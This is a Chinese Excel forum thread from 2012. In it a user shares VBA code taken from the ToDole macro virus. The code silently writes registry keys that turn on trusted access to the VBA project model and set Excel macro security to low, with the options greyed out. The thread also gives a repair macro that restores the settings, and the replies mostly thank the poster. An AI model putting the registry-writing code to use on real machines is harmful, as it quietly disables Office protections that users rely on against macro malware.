ExcelHome技术论坛

 找回密码
 免费注册

QQ登录

只需一步,快速开始

快捷登录

搜索
EH技术汇-专业的职场技能充电站 妙哉!函数段子手趣味讲函数 Excel服务器-会Excel,做管理系统 效率神器,一键搞定繁琐工作
HR薪酬管理数字化实战 Excel 2021函数公式学习大典 Excel数据透视表实战秘技 打造核心竞争力的职场宝典
让更多数据处理,一键完成 数据工作者的案头书 免费直播课集锦 ExcelHome出品 - VBA代码宝免费下载
用ChatGPT与VBA一键搞定Excel WPS表格从入门到精通 Excel VBA经典代码实践指南
查看: 23353|回复: 40

[分享] 用VBA代码开启“信任对VBA工程对象模型的访问”的方法

  [复制链接]

TA的精华主题

TA的得分主题

发表于 2012-6-19 14:11 | 显示全部楼层 |阅读模式
本帖已被收录到知识树中,索引项:保护和加密编程
本帖最后由 旭日升 于 2012-6-19 14:11 编辑

昨天从同事那里得到一个宏病毒ToDole,里面有一段代码是用于开启VBA工程对象的,觉得很不错,经过研究后,现拿出现分享一下。

  1. Function OpenDoor()
  2. Dim Fso, RK1 As String, RK2 As String, RK3 As String, RK4 As String
  3. Dim KValue1 As Variant, KValue2 As Variant
  4. Dim VS As String
  5. On Error Resume Next
  6. VS = Application.Version
  7. Set Fso = CreateObject("scRiPTinG.fiLEsysTeMoBjEcT")
  8. RK1 = "HKEY_CURRENT_USER\Software\Microsoft\Office" & VS & "\Excel\Security\AccessVBOM"
  9. RK2 = "HKEY_CURRENT_USER\Software\Microsoft\Office" & VS & "\Excel\Security\Level"
  10. RK3 = "HKEY_LOCAL_MACHINE\Software\Microsoft\Office" & VS & "\Excel\Security\AccessVBOM"
  11. RK4 = "HKEY_LOCAL_MACHINE\Software\Microsoft\Office" & VS & "\Excel\Security\Level"
  12. KValue1 = 1
  13. KValue2 = 1
  14.       Call WReg(RK1, KValue1, "REG_DWORD")
  15.       Call WReg(RK2, KValue2, "REG_DWORD")
  16.       Call WReg(RK3, KValue1, "REG_DWORD")
  17.       Call WReg(RK4, KValue2, "REG_DWORD")
  18. End Function
  19. '--------------------------------------------------------------------------------------------------------------------------------------------
  20. Sub WReg(strkey As String, Value As Variant, ValueType As String)
  21.     Dim oWshell
  22.     Set oWshell = CreateObject("WScript.Shell")
  23.     If ValueType = "" Then
  24.         oWshell.RegWrite strkey, Value
  25.     Else
  26.         oWshell.RegWrite strkey, Value, ValueType
  27.     End If
  28.     Set oWshell = Nothing
  29. End Sub
复制代码
这段代码使用了WINDOWS脚本文件对注册表进行修改,从这一点来看,病毒还是挺可怕的,你不知道他在注册表里面会干些什么。
在运行这段代码后,将开启“信任对VBA工程对象模型的访问”,且该选项将变成灰色。
在上面代码中:
1.“AccessVBOM”项的值为1代表开启,0表示关闭“信任对VBA工程对象模型的访问”
2.“Level”项的值1,2,3分别表示宏的安全级别为低、中、高。
3.而语句中“HKEY_LOCAL_MACHINE\Software\Microsoft\Office\" & VS & "\Excel\Security\AccessVBOM ”和“HKEY_LOCAL_MACHINE\Software\Microsoft\Office\" & VS & "\Excel\Security\Level”添加过后会将相关的选项变成灰色,变为不可选。

解决变灰的问题,可以手动删除代码中涉及的键值或者运行代码:
  1. Sub VBA工程修复()
  2. On Error Resume Next
  3. With CreateObject("WSCRIPT.SHELL")
  4.     .REGDELETE "HKLM\Software\Microsoft\Office" & Application.Version & "\Excel\Security"
  5.     .REGWRITE "HKCU\Software\Microsoft\Office" & Application.Version & "\Excel\Security\AccessVBOM", 0, "REG_DWORD"
  6.     .REGWRITE "HKCU\Software\Microsoft\Office" & Application.Version & "\Excel\Security\Level", 3, "REG_DWORD"
  7. End With
  8. End Sub

复制代码

另外,查杀宏病毒,可到金山毒霸论坛下载专用工具:
http://bbs.duba.net/thread-22450603-1-1.html?ver=pop
该工具在不断更新中。


评分

4

查看全部评分

TA的精华主题

TA的得分主题

发表于 2012-6-29 17:36 | 显示全部楼层
[广告] VBA代码宝 - VBA编程加强工具 · VBA代码随查随用  · 内置多项VBA编程加强工具       ★ 免费下载 ★      ★使用手册
Mark it and test it .Thanks a lot.

TA的精华主题

TA的得分主题

发表于 2012-6-29 19:15 | 显示全部楼层
[广告] Excel易用宝 - 提升Excel的操作效率 · Excel / WPS表格插件       ★免费下载 ★       ★ 使用帮助
谢谢分享

TA的精华主题

TA的得分主题

发表于 2012-8-7 10:40 | 显示全部楼层

TA的精华主题

TA的得分主题

发表于 2012-10-6 07:41 | 显示全部楼层
过于高深,暂时理解不了。
请问各位高手:在哪里手工修改?

TA的精华主题

TA的得分主题

 楼主| 发表于 2012-10-15 11:35 | 显示全部楼层
jingchunbi 发表于 2012-10-6 07:41
过于高深,暂时理解不了。
请问各位高手:在哪里手工修改?

点“开始”菜单,打开“运行”对话框,输入REGEDIT后确定,将打开注册表编辑器,在左侧的目录树中寻找。

TA的精华主题

TA的得分主题

发表于 2012-10-15 13:13 | 显示全部楼层
楼主,我试了你的代码,发现没有作用啊。我的win 7系统+office 2010的环境
我插入代码后,还是报错。

TA的精华主题

TA的得分主题

发表于 2012-12-2 16:06 | 显示全部楼层

TA的精华主题

TA的得分主题

发表于 2013-1-22 10:58 | 显示全部楼层

TA的精华主题

TA的得分主题

发表于 2014-1-21 11:33 | 显示全部楼层
您需要登录后才可以回帖 登录 | 免费注册

本版积分规则

手机版|关于我们|联系我们|ExcelHome

GMT+8, 2024-12-4 01:11 , Processed in 0.045794 second(s), 11 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 1999-2023 Wooffice Inc.

沪公网安备 31011702000001号 沪ICP备11019229号-2

本论坛言论纯属发表者个人意见,任何违反国家相关法律的言论,本站将协助国家相关部门追究发言者责任!     本站特聘法律顾问:李志群律师

快速回复 返回顶部 返回列表